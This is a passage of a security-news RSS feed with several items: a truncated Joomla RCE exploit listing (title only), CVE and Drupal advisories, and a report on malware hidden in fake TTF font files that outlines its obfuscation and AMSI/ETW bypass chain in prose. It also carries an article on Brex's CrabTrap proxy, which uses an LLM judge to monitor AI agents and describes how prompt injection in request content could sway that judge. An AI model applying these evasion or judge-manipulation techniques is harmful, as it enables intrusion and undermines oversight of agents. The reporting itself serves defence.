<description><![CDATA[Topic: Joomla Page Builder CK < = 3.5.10 - Unauthenticated Arbitrary File Upload (RCE) Risk: High Text:#!/usr/bin/env python3  # Exploit Title: Joomla Page Builder CK < = 3.5.10 - Unauthenticated Arbitrary File Upload (RCE)  # Goog...]]></description>
<link>https://tsecurity.de/de/3679245/poc/joomla-page-builder-ck-3510-unauthenticated-arbitrary-file-upload-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679245/poc/joomla-page-builder-ck-3510-unauthenticated-arbitrary-file-upload-rce/</guid>
<pubDate>Sun, 19 Jul 2026 11:36:24 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Joomla Page Builder CK &lt; = 3.5.10 - Unauthenticated Arbitrary File Upload (RCE) Risk: High Text:#!/usr/bin/env python3  # Exploit Title: Joomla Page Builder CK &lt; = 3.5.10 - Unauthenticated Arbitrary File Upload (RCE)  # Goog...]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3688 | WPQA Builder Plugin up to 5.8 on WordPress cross-site request forgery (EUVD-2022-43047)]]></title>
<description><![CDATA[A vulnerability was found in WPQA Builder Plugin up to 5.8 on WordPress. It has been classified as problematic. Impacted is an unknown function. Performing a manipulation results in cross-site request forgery.

This vulnerability is known as CVE-2022-3688. Remote exploitation of the attack is pos...]]></description>
<link>https://tsecurity.de/de/3679072/sicherheitsluecken/cve-2022-3688-wpqa-builder-plugin-up-to-58-on-wordpress-cross-site-request-forgery-euvd-2022-43047/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679072/sicherheitsluecken/cve-2022-3688-wpqa-builder-plugin-up-to-58-on-wordpress-cross-site-request-forgery-euvd-2022-43047/</guid>
<pubDate>Sun, 19 Jul 2026 09:38:34 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/wpqa_builder_plugin">WPQA Builder Plugin up to 5.8</a> on WordPress. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Impacted is an unknown function. Performing a manipulation results in cross-site request forgery.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2022-3688">CVE-2022-3688</a>. Remote exploitation of the attack is possible. No exploit is available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-54163 | github secure_headers up to 7.2.x Content-Security-Policy Builder sandbox/plugin_types/report_to cross site scripting (Nessus ID 327783)]]></title>
<description><![CDATA[A vulnerability was found in github secure_headers up to 7.2.x. It has been classified as problematic. This vulnerability affects the function build_sandbox_list_directive/build_media_type_list_directive/build_report_to_directive of the component Content-Security-Policy Builder. Performing a mani...]]></description>
<link>https://tsecurity.de/de/3678659/sicherheitsluecken/cve-2026-54163-github-secureheaders-up-to-72x-content-security-policy-builder-sandboxplugintypesreportto-cross-site-scripting-nessus-id-327783/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678659/sicherheitsluecken/cve-2026-54163-github-secureheaders-up-to-72x-content-security-policy-builder-sandboxplugintypesreportto-cross-site-scripting-nessus-id-327783/</guid>
<pubDate>Sun, 19 Jul 2026 02:20:44 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/github:secure_headers">github secure_headers up to 7.2.x</a>. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This vulnerability affects the function <code>build_sandbox_list_directive/build_media_type_list_directive/build_report_to_directive</code> of the component <em>Content-Security-Policy Builder</em>. Performing a manipulation of the argument <em>sandbox/plugin_types/report_to</em> results in cross site scripting.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-54163">CVE-2026-54163</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-12978 | FunnelKit Plugin 3.10.2/3.12.0.1 on WordPress Divi Builder cross site scripting (CNNVD-2026-96888595)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in FunnelKit Plugin 3.10.2/3.12.0.1 on WordPress. This issue affects some unknown processing of the component Divi Builder. The manipulation results in cross site scripting.

This vulnerability is reported as CVE-2026-12978. The attack ...]]></description>
<link>https://tsecurity.de/de/3677208/sicherheitsluecken/cve-2026-12978-funnelkit-plugin-310231201-on-wordpress-divi-builder-cross-site-scripting-cnnvd-2026-96888595/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677208/sicherheitsluecken/cve-2026-12978-funnelkit-plugin-310231201-on-wordpress-divi-builder-cross-site-scripting-cnnvd-2026-96888595/</guid>
<pubDate>Sat, 18 Jul 2026 01:09:41 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/funnelkit_plugin">FunnelKit Plugin 3.10.2/3.12.0.1</a> on WordPress. This issue affects some unknown processing of the component <em>Divi Builder</em>. The manipulation results in cross site scripting.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-12978">CVE-2026-12978</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Brex built its AI agent policy by watching what agents actually do, not by writing rules first]]></title>
<description><![CDATA[OpenClaw has become one of the most widely adopted agentic frameworks, but it has yet to prove itself at enterprise scale. Agents need real credentials — API keys, OAuth tokens, service accounts — to work effectively, and Brex found that traditional guardrails couldn't contain what those agents w...]]></description>
<link>https://tsecurity.de/de/3676907/it-nachrichten/brex-built-its-ai-agent-policy-by-watching-what-agents-actually-do-not-by-writing-rules-first/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676907/it-nachrichten/brex-built-its-ai-agent-policy-by-watching-what-agents-actually-do-not-by-writing-rules-first/</guid>
<pubDate>Fri, 17 Jul 2026 21:32:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://venturebeat.com/security/openclaw-500000-instances-no-enterprise-kill-switch">OpenClaw</a> has become one of the most widely adopted agentic frameworks, but it has yet to prove itself at enterprise scale. Agents need real credentials — API keys, OAuth tokens, service accounts — to work effectively, and Brex found that traditional guardrails couldn't contain what those agents were doing with them.</p><p>Brex set out to overcome these limitations by building an internal platform it calls CrabTrap. The <a href="https://www.brex.com/journal/building-crabtrap-open-source">open-source HTTP/HTTPS proxy</a> intercepts all network traffic, examines policy rules, and uses a LLM-as-a-judge to decide whether agent requests should be approved or denied. </p><p>“What we noticed was that the network layer was an untapped enforcement point,” Brex co-founder and CEO Pedro Franceschi told VentureBeat. “Every request an agent makes is an opportunity to intercept, reason about, and make a policy decision.”</p><p>The takeaway Franceschi wants IT leaders to draw: agent governance should shift from SDK-level permissions and model guardrails toward a centralized network control plane that enforces and learns from real in-the-wild agent behavior.</p><h2>How Brex targeted the transport layer</h2><p>The “obvious fix” (at least initially) to the agent security gap was guardrails, and much of the early work has centered on scoped tools, per-action permissions, and human-in-the-loop approvals. But as agents evolve, each new capability means there’s another API to tune or surface to audit, Franceschi noted. </p><p>“Any <a href="https://venturebeat.com/orchestration/trunk-tools-stack-cut-document-review-from-60-days-to-10-by-ditching-general-purpose-models">agentic system</a> with multiple tools and access to the open internet creates an immediate tension for builders: The more capable you make an agent, the more dangerous it becomes, and the safer you make it, the less useful it is,” he said. </p><p>Existing solutions to this tradeoff were “weak”: Fine-grained API tokens help at the margins but can still be misused and constrain functionality. Semantic guardrails (such as context, skills, or prompt steering) are easily bypassed by prompt injection, especially for agents connected to the internet.</p><p>Agents can be “defanged” when given read-only access or limited toolsets, but then they can't do meaningful work, Franceschi said. On the other hand, granting broad write access and a large tool surface can result in hallucinations and real production consequences.</p><p>Model context protocol (MCP) gateways enforce policy at the protocol layer — but only for traffic using MCP. Meanwhile, guardrails from LLM providers are tied to a single model and can be “opaque” to customize with enterprise-specific policies. And powerful tools like Nvidia OpenShell offer more of a “per-sandbox egress control.”</p><p>“When we started, we hadn’t found a solution to deploying harnesses like OpenClaw safely,” Franceschi said. “Instead of waiting for the industry to catch up, we decided to own the problem and invent the necessary tools.”</p><p>Notably, they needed a platform that sat between every agent and every network request, and could make “nuanced decisions about what to allow,” he said. </p><p>This made the transport layer a core architectural component and natural starting point, he said. </p><p>By operating at this layer, CrabTrap is framework-agnostic, language-agnostic, and API-agnostic. It doesn't require SDK wrappers or per-tool integration. Users set <i>HTTP_PROXY</i> and <i>HTTPS_PROXY</i> in the agent's environment, and every outbound request routes through the proxy before it reaches a destination.</p><p>However, Franceschi emphasized, Brex didn't start at the transport layer because it thought it was the only answer; rather, they believe in “security by layers.”</p><p>“The transport layer was simply an underinvested one, and we saw an opportunity to add meaningful enforcement there alongside everything else,” he said. </p><h2>The LLM-as-a-judge training loop</h2><p>CrabTrap combines deterministic static rules with an <a href="https://venturebeat.com/infrastructure/monitoring-llm-behavior-drift-retries-and-refusal-patterns">LLM-as-a-judge</a> for requests that fall outside known patterns, Franceschi explained. The judge only “fires on the long tail of unfamiliar endpoints or unusual request shapes,” which for a mature agent is typically fewer than 3% of requests.</p><p>The more pressing problem was how to know that a policy is the right one? With static rules, it's “relatively straightforward” to reason about accuracy. But with an LLM judge, the system is nondeterministic, and users need confidence that the policy approves the right requests and blocks the rest.</p><p>“Our key insight was to bootstrap policy from observed behavior rather than write it from scratch,” Franceschi said. Beginning with real behavior and editing down based on real-world learnings turned out to be “dramatically more effective than starting from a blank page.”</p><p>Brex’s team built a policy builder (itself an agentic loop) that runs underlying agents in shadow mode, analyzes historic network traffic, samples representative calls, and drafts a natural-language policy that matches what the agent actually does. </p><p>From there, they built an eval system that tests policy changes before they go live. CrabTrap compares historical audit entries against a draft policy and reports the exact changes to be made. Users can slice results by method, URL, original decision, and agreement status. </p><p>All of this runs with concurrent judge calls, so replaying thousands of requests “takes minutes, not hours,” Franceschi said. Brex also developed a live feedback loop: Full audit trails are stored in PostgreSQL and queryable through the admin API and dashboard. In cases where a resource is continuously denied, the system can notify a human or an agent to propose a policy update for review. </p><p>“That closes the loop between observed denials and policy refinement,” Franceschi said. </p><h2>Core challenges and roadblocks </h2><p>Of course, the build wasn’t without its challenges. A big one was latency: “Putting an LLM between an agent and every outbound API request sounds like it would grind things to a halt,” he said. </p><p>However, it didn’t turn out to be as big a problem as expected. This was for two reasons: The LLM judge only activates on a small fraction of requests (the aforementioned 3%). Agents quickly settle into predictable traffic patterns; once observed, high-volume patterns become static rules. Second, by using small, fast models like Claude Haiku meant that, even when the judge did fire, added latency was “negligible.” This can be further reduced with local models and prompt caching, Franceschi said. </p><p>The harder and less obvious challenge was prompt injection, he said. The judge receives the full HTTP request and all content is user-controlled, so potentially, a crafted URL, header, or request body could manipulate the judge's decision. </p><p>Brex addressed this by structuring the request as a JSON object before sending it to the model, so all user-controlled content is “escaped rather than interpolated as raw text,” Franceschi said. </p><h2>Results, and where CrabTrap might evolve</h2><p>Brex tracks a few factors to measure CrabTrap’s internal impact: Engagement with agents, network traffic patterns, and net promoter scores (NPS). The most meaningful result of CrabTrap has been “organizational confidence,” Franceschi said. </p><p>Previously, the team had “real hesitation” when it came to deploying autonomous agents broadly across business operations, because the existing guardrail options didn't provide enough assurance. </p><p>“CrabTrap changed that calculus,” Franceschi said. They now have an enforcement layer they trust, increasing confidence around expanding agent deployment into more parts of the business and delegating more agent configuration and management to users. </p><p>Franceschi described the policies derived from traffic as “surprisingly strong.” The team expected the policy builder to produce a “rough starting point” requiring heavy manual editing. In practice, though, pointing the platform at a few days of real traffic produced policies that matched human judgment on the “vast majority of held-out requests.”</p><p>Additionally, CrabTrap revealed how much noise agents generate. “The audit trail made this visible for the first time,” Franceschi said. They used denial logs and traffic analysis not only to tune policies, but to tighten agents themselves, remove tools, and cut out entire categories of requests that were wasting both time and tokens.</p><p>“The proxy became a discovery tool, not just an enforcement one,” he said. </p><h2>Areas for growth (and input from the open-source community)</h2><p>Brex anticipates CrabTrap to continue to evolve, particularly as they have released it as open-source. “We hope the community helps shape it,” Franceschi said. </p><p>Areas of improvement include deeper authentication functionality such as single-sign on (SSO), fine-grained role-based access control (RBAC); escalation workflows that allow agents to request additional permissions; and policy recommendations based on denial patterns.</p><p>Programmatic configuration, or developing API endpoints for “creating, forking, and applying” policies to agents, could allow the whole policy lifecycle to be automated rather than managed manually, Franceschi said. </p><p>As for escalation, if an agent is continuously denied a given resource or endpoint, it should be able to route requests to humans or other AI agents for review and back that up with a rationale for why it needs access. </p><p>“That turns CrabTrap from a hard enforcement boundary into something more like a managed permission system,” Franceschi said. </p><p>Additionally, the policy was built to bootstrap from network traffic, but there is opportunity to incorporate additional signals around agent traces and resource-calling, as well as broader context on what agents are ultimately trying to accomplish. This can help produce more accurate and nuanced policies. </p><p>Finally, there's an “open philosophical question” about the right posture for CrabTrap: Should it be a fully transparent layer that the agent itself is unaware of, or should it operate more like a “well-intentioned manager”? (that is, the agent knows about the layer and can interact with it). </p><p>The open-source community can help shape these developments, and CrabTrap will only get better with more users, Franceschi said. Brex’s agents speak to a specific set of APIs; teams using CrabTrap with different agents, services, and policy requirements will surface “edge cases and patterns we can't hit alone.”</p><p>“We have ambitious plans for where it could go, and we’d rather build in the open,” Franceschi said. </p><h2>What other builders can learn from CrabTrap</h2><p>The response has been stronger than expected. <a href="https://github.com/brexhq/CrabTrap">CrabTrap has more than 700 stars on GitHub</a>. Franceschi said Brex has also heard from OpenAI, Y Combinator CEO Garry Tan, and programmer Pete Steinberger, all expressing interest in deploying similar internal infrastructure.</p><p>The broader lesson: “Don't let infrastructure gaps become excuses to wait," Franceschi advised. There are “real blockers” for every enterprise looking to seriously deploy AI agents, including security concerns, lack of tooling, or unclear guardrails. </p><p>“It's tempting to sit on your hands until the industry catches up,” he said. “The lesson from CrabTrap is that you can own those problems directly.”</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake TTF files deliver stealthy malware in global phishing campaign]]></title>
<description><![CDATA[Threat actors are now abusing an ordinary font file to deliver low-detection malware capable of stealing credentials and establishing persistence on compromised Windows systems.



According to a new research from Fortinet’s FortiGuard Labs, a global phishing campaign is actively using heavily ob...]]></description>
<link>https://tsecurity.de/de/3675510/it-security-nachrichten/fake-ttf-files-deliver-stealthy-malware-in-global-phishing-campaign/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675510/it-security-nachrichten/fake-ttf-files-deliver-stealthy-malware-in-global-phishing-campaign/</guid>
<pubDate>Fri, 17 Jul 2026 10:54:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Threat actors are now abusing an ordinary font file to deliver low-detection malware capable of stealing credentials and establishing persistence on compromised Windows systems.</p>



<p class="wp-block-paragraph">According to a new research from Fortinet’s FortiGuard Labs, a global phishing campaign is actively using heavily obfuscated JavaScript and a Lua-based loader posing as a TrueType Font (TTF) file to evade security and drop RATs and infostealers.</p>



<p class="wp-block-paragraph">A TTF file is a standard font file used by operating systems and applications to display text.</p>



<p class="wp-block-paragraph">The campaign has been deploying malware families such as <a href="https://www.csoonline.com/article/573813/malware-builder-uses-fresh-tactics-to-hit-victims-with-agent-tesla-rat.html">Agent Tesla</a>, Remcos, <a href="https://www.csoonline.com/article/4064720/xworm-campaign-shows-a-shift-toward-fileless-malware-and-in-memory-evasion-tactics.html">XWorm</a>, and a Snake Keylogger variant known as Best Private LOGGER, since at least late March 2026. “In these attacks, the threat actor impersonates several well-known companies, using the guise of business cooperation to launch phishing attacks,” FortiGuard researchers said in a blog <a href="https://www.fortinet.com/blog/threat-research/the-ttf-trap-a-global-campaign-of-a-low-detection-lua-loader" target="_blank" rel="noreferrer noopener">post</a>.</p>



<p class="wp-block-paragraph">Talking about how a new attack technique seems to still rely on conventional phishing tricks, <a href="https://www.linkedin.com/in/shane-barney-69026528/" target="_blank" rel="noreferrer noopener">Shane Barney</a>, CISO at Keeper Security, said, “The most sophisticated technical evasion in the world still starts the same way: someone opens an email from what looks like a trusted company and acts on it.”</p>



<p class="wp-block-paragraph">“The obfuscation layers, the Lua loader disguised as a font file, the fileless execution chain – all of it exists to survive detection after that human decision has already been made, and organizations would do well to keep that in their sightline,” he added.</p>



<h2 class="wp-block-heading">Business and payment-themed phishing lures used</h2>



<p class="wp-block-paragraph">According to the researchers, victims receive phishing emails impersonating well-known companies and using business collaboration or payment-related themes to trick recipients into opening compressed archives. These archives contain the obfuscated JScript that establishes persistence before dropping either a legitimate Autolt executable or a LuaJIT interpreter, along with a malicious script packaged within a .ttf extension.</p>



<p class="wp-block-paragraph">The fake font file functions as a Lua-based loader that runs multiple de-obfuscation steps before decrypting and executing shellcode directly in memory.</p>



<p class="wp-block-paragraph">“Security controls cannot treat a file extension as proof of file type or intent,” said <a href="https://www.linkedin.com/in/jason-soroko-19b41920/" target="_blank" rel="noreferrer noopener">Jason Soroko</a>, senior fellow at Sectigo. “Each component (of the campaign) may appear less suspicious when reviewed alone, while the combined sequence leads to in-memory execution of RATs and infostealers.”</p>



<p class="wp-block-paragraph">Some of the new variants, the researchers pointed out, are getting more sophisticated by introducing segmented shellcode encryption, Vectored Exception Handler (VEH)- based runtime decryption, AMSI and ETW bypasses, API unhooking, and other anti-analysis techniques designed to evade endpoint defenses.</p>



<p class="wp-block-paragraph">The final malware payload is delivered using <a href="https://www.csoonline.com/article/4125567/this-stealthy-windows-rat-holds-live-conversations-with-its-operators.html?utm=hybrid_search#:~:text=This%20PowerShell%20loader%20decodes%20and%20executes%20shellcode%20generated%20using%20Donut%2C%20an%20open-source%20framework%20commonly%20used%20to%20convert.%20NET%20assemblies%20into%20position-independent%20shellcode.">Donut</a> shellcode, allowing execution without writing the payload to disk.</p>



<p class="wp-block-paragraph">Protection requires targeted mitigations and routine security hygiene</p>



<p class="wp-block-paragraph">Fortinet’s findings confirm the attackers’ endgame to be stealing credentials and maintaining long-term access. The malware families observed, including Agent Tesla, Remcos, XWorm, and Best Private LOGGER, are all focused on credential theft, surveillance, or remote access.</p>



<p class="wp-block-paragraph">Barney said organizations should resist focusing exclusively on the loader’s technical sophistication and instead strengthen the systems attackers eventually want to compromise.</p>



<p class="wp-block-paragraph">In his opinion, identity and access controls are what it comes down to, as signature-based detection often fails against the loader sophistication of this grade. “Limiting what any given set of credentials can reach, enforcing least privilege, requiring re-authentication for sensitive systems, and monitoring for anomalous session behavior will not stop every phishing email from landing, but they significantly constrain what an attacker can accomplish after one succeeds,” he explained.</p>



<p class="wp-block-paragraph">Soroko, on the other hand, recommends focusing controls on the technical indicators. He urged organizations to restrict Windows Script Host, Autolt, and LauJIT wherever they are not operationally required, monitor for behaviors such as process injection, remote memory allocation, and shellcode execution, and use Fortinet’s published indicators for threat hunting.</p>



<p class="wp-block-paragraph">The indicators of compromise (IOCs) Fortinet shared include the command-and-control (C2) addresses, file hashes, and filenames.</p>



<p class="wp-block-paragraph">Soroko warned against relying solely on hashes or C2 infrastructure because the loader has changed over time. “The stronger approach is to detect the stable behavior across versions, then test controls against the complete chain,” he said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-12409 | umarbajwa Landing Page Builder Plugin up to 1.5.3.6 on WordPress Admin AJAX ulpb_admin_ajax cross-site request forgery (EUVD-2026-44858)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in umarbajwa Landing Page Builder Plugin up to 1.5.3.6 on WordPress. Affected is the function ulpb_admin_ajax of the component Admin AJAX Handler. Performing a manipulation results in cross-site request forgery.

This vulnerability is known...]]></description>
<link>https://tsecurity.de/de/3672435/sicherheitsluecken/cve-2026-12409-umarbajwa-landing-page-builder-plugin-up-to-1536-on-wordpress-admin-ajax-ulpbadminajax-cross-site-request-forgery-euvd-2026-44858/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672435/sicherheitsluecken/cve-2026-12409-umarbajwa-landing-page-builder-plugin-up-to-1536-on-wordpress-admin-ajax-ulpbadminajax-cross-site-request-forgery-euvd-2026-44858/</guid>
<pubDate>Thu, 16 Jul 2026 07:38:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/umarbajwa:landing_page_builder_plugin">umarbajwa Landing Page Builder Plugin up to 1.5.3.6</a> on WordPress. Affected is the function <code>ulpb_admin_ajax</code> of the component <em>Admin AJAX Handler</em>. Performing a manipulation results in cross-site request forgery.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-12409">CVE-2026-12409</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Drupal core - Moderately critical - Cross-site scripting - SA-CORE-2026-012]]></title>
<description><![CDATA[Project: Drupal coreDate: 2026-July-14Security risk: Moderately critical 13 ∕ 25 AC:Basic/A:User/CI:Some/II:Some/E:Theoretical/TD:DefaultVulnerability: Cross-site scriptingAffected versions: =11.3.0 =11.4.0]]></description>
<link>https://tsecurity.de/de/3671754/it-security-nachrichten/drupal-core-moderately-critical-cross-site-scripting-sa-core-2026-012/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671754/it-security-nachrichten/drupal-core-moderately-critical-cross-site-scripting-sa-core-2026-012/</guid>
<pubDate>Wed, 15 Jul 2026 21:53:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="field field-name-field-project field-type-entityreference field-label-inline clearfix"><div class="field-label">Project: </div><div class="field-items"><div class="field-item even"><a href="https://www.drupal.org/project/drupal">Drupal core</a></div></div></div><div class="field field-name-drupalorg-sa-date field-type-text field-label-inline clearfix"><div class="field-label">Date: </div><div class="field-items"><div class="field-item even">2026-July-14</div></div></div><div class="field field-name-field-sa-criticality field-type-text field-label-inline clearfix"><div class="field-label">Security risk: </div><div class="field-items"><div class="field-item even"><a href="https://www.drupal.org/security-team/risk-levels" class="moderately-critical" title="AC - Access complexity: Basic or routine (user must follow specific path)
A - Authentication: User-level access (basic/commonly assigned permissions)
CI - Confidentiality impact: Certain non-public data is released
II - Integrity impact: Some data can be modified
E - Exploit (Zero-day impact): Theoretical or white-hat (no public exploit code or documentation on development exists)
TD - Target distribution: Default or common module configurations are exploitable, but a config change can disable the exploit"><strong>Moderately critical</strong> 13 ∕ 25 AC:Basic/A:User/CI:Some/II:Some/E:Theoretical/TD:Default</a></div></div></div><div class="field field-name-field-sa-type field-type-text field-label-inline clearfix"><div class="field-label">Vulnerability: </div><div class="field-items"><div class="field-item even">Cross-site scripting</div></div></div><div class="field field-name-field-affected-versions field-type-text field-label-inline clearfix"><div class="field-label">Affected versions: </div><div class="field-items"><div class="field-item even">&lt;10.6.13 || &gt;=11.3.0 &lt;11.3.14 || &gt;=11.4.0 &lt;11.4.4 || 11.0.* || 11.1.* || 11.2.*</div></div></div><div class="field field-name-field-sa-cve field-type-text field-label-inline clearfix"><div class="field-label">CVE IDs: </div><div class="field-items"><div class="field-item even">CVE-2026-55805</div></div></div><div class="field field-name-field-sa-description field-type-text-long field-label-above"><div class="field-label">Description: </div><div class="field-items"><div class="field-item even"><p>The Layout Builder module doesn't sufficiently sanitize block labels in certain scenarios, which can lead to a cross-site scripting (XSS) vulnerability.</p>
<p>This is mitigated by the fact that both the attacker and the targeted user need to be using the Layout Builder editing interface.  </p></div></div></div><div class="field field-name-field-sa-solution field-type-text-long field-label-above"><div class="field-label">Solution: </div><div class="field-items"><div class="field-item even"><p>Install the latest version:</p>
<p><strong>Drupal 11</strong></p>
<ul>
<li>If you use Drupal 11.4.x, update to <a href="https://www.drupal.org/project/drupal/releases/11.4.4" rel="nofollow">Drupal 11.4.4</a>.</li>
<li>If you use Drupal 11.3.x, update to <a href="https://www.drupal.org/project/drupal/releases/11.3.14" rel="nofollow">Drupal 11.3.14</a>.</li>
<li>Drupal 11.2.x and below are end-of-life and do not receive security coverage.</li>
</ul>
<p><strong>Drupal 10</strong></p>
<ul>
<li>If you use Drupal 10.6.x, update to <a href="https://www.drupal.org/project/drupal/releases/10.6.13" rel="nofollow">Drupal 10.6.13</a>.</li>
<li>Drupal 10.5.x and below are end-of-life and do not receive security coverage.</li>
</ul>
<p><a href="https://www.drupal.org/psa-2021-06-29" rel="nofollow">Drupal 8</a> and <a href="https://www.drupal.org/psa-2023-11-01" rel="nofollow">Drupal 9</a> have both reached end-of-life.</p></div></div></div><div class="field field-name-field-sa-reported-by field-type-text-long field-label-above"><div class="field-label">Reported By: </div><div class="field-items"><div class="field-item even"><ul>
<li><a href="https://www.drupal.org/u/hai27ii2o" rel="nofollow">haii haii (hai27ii2o)</a>
</li></ul></div></div></div><div class="field field-name-field-sa-fixed-by field-type-text-long field-label-above"><div class="field-label">Fixed By: </div><div class="field-items"><div class="field-item even"><ul>
<li><a href="https://www.drupal.org/u/danielveza" rel="nofollow">danielveza</a>
</li><li><a href="https://www.drupal.org/u/larowlan" rel="nofollow">Lee Rowlands (larowlan)</a> of the Drupal Security Team
</li><li><a href="https://www.drupal.org/u/mingsong" rel="nofollow">Mingsong  (mingsong)</a> provisional member of the Drupal Security Team
</li><li><a href="https://www.drupal.org/u/neclimdul" rel="nofollow">James Gilliland (neclimdul)</a> of the Drupal Security Team
</li></ul></div></div></div><div class="field field-name-field-sa-coordinated-by field-type-text-long field-label-above"><div class="field-label">Coordinated By: </div><div class="field-items"><div class="field-item even"><ul>
<li><a href="https://www.drupal.org/u/greggles" rel="nofollow">Greg Knaddison (greggles)</a> of the Drupal Security Team
</li><li><a href="https://www.drupal.org/u/larowlan" rel="nofollow">Lee Rowlands (larowlan)</a> of the Drupal Security Team
</li><li><a href="https://www.drupal.org/u/longwave" rel="nofollow">Dave Long (longwave)</a> of the Drupal Security Team
</li><li><a href="https://www.drupal.org/u/xjm" rel="nofollow">Jess  (xjm)</a> of the Drupal Security Team
</li></ul></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nostalgic Bondi Blue iMac G3 Could Become An Official LEGO Set]]></title>
<description><![CDATA[Do you remember the colorful translucent computers from the late nineties? A dedicated fan builder has created an impressive replica of the classic 1998 Bondi Blue iMac G3 using standard building blocks. This creative project recently gained massive support online and is now officially under revi...]]></description>
<link>https://tsecurity.de/de/3671310/ios-mac-os/nostalgic-bondi-blue-imac-g3-could-become-an-official-lego-set/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671310/ios-mac-os/nostalgic-bondi-blue-imac-g3-could-become-an-official-lego-set/</guid>
<pubDate>Wed, 15 Jul 2026 18:11:45 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Do you remember the colorful translucent computers from the late nineties? A dedicated fan builder has created an impressive replica of the classic 1998 Bondi Blue iMac G3 using standard building blocks. This creative project recently gained massive support online and is now officially under review by the manufacturer.



If everything falls into place, you might soon be able to build a physical piece of computer history right on your desk.



The fan design features clear blue bricks and internal details



The proposed set comes from a creator named terauma on the official Ideas platform. This builder used exactly 700 pieces to recreate the famous desktop computer in stunning accuracy. The model perfectly captures the original retro aesthetic by using see through blue parts for the distinctive outer shell.



When you look closer, the attention to detail becomes even more obvious. The builder thoughtfully included small versions of the internal circuit boards and the heavy cathode ray tube monitor inside the casing. The whole package also features matching desktop accessories. Builders get to piece together the famous round hockey puck mouse and the classic keyboard with clear cables. It is a perfect tribute to the original Mac that helped reshape the personal computing market.



The final approval completely depends on passing strict licensing hurdles



The project recently reached a major milestone by gathering 10,000 votes from community supporters. This huge number means the toy company must formally review the idea for mass production. Currently, the set is sitting in a special parking lot status. This simply means the review board needs extra time to make a final decision, which is actually a very positive sign instead of an instant rejection.



The biggest challenge now is getting official permission from Apple to sell a branded product. The hardware maker is famously strict about its intellectual property and rarely approves third party merchandise. A previous fan project for a brick built retail store was quickly denied.



However, the extended review time suggests the two companies might be actively talking. If the tech brand decides to embrace its own history, this colorful kit could become a massive hit for vintage computer fans everywhere.]]></content:encoded>
</item>
<item>
<title><![CDATA[Port releases vibe coding platform for dev and platform teams]]></title>
<description><![CDATA[Port has rolled out Port AI Builder, a vibe coding platform designed for software development and platform engineering teams.



Announced July 14, Port AI Builder lets teams create and run agentic workflows in natural language, with built-in human-in-the-loop review and approval. The platform le...]]></description>
<link>https://tsecurity.de/de/3671155/ai-nachrichten/port-releases-vibe-coding-platform-for-dev-and-platform-teams/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671155/ai-nachrichten/port-releases-vibe-coding-platform-for-dev-and-platform-teams/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:24 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Port has rolled out Port AI Builder, a vibe coding platform designed for software development and platform engineering teams.</p>



